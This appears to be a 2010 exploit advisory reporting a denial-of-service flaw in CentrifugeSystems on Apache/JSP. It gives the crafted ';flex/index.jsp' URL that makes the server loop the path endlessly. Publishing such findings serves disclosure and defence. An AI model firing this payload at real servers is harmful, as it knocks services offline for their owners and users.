CentrifugeSystems suffers from a denial of service vulnerability due to a looping condition.
*******************************Automated Looping in Apache/JSP AND CentrifugeSystems***********************************
# Exploit Title: Automated Looping in CentrifugeSystems
# Date: 14-Jan-10
# Author: Asheesh Kumar Mani Tripathi
# Software Link: www.centrifugesystems.com
Description: Exceptional Conditional Error
This type of vulnerability is found mainly in Apache/JSP pages when proper filters are not in place,
and it results in a DoS attack.
Vulnerability: http://192.168.145.129:9090/Centrifuge/;flex/index.jsp
Result: http://192.168.145.129:9090/Centrifuge/;flex/flex/flex/flex/ ... /flex/flex/flex/index.jsp
(the /flex path segment repeats continuously across the elided part of the URL)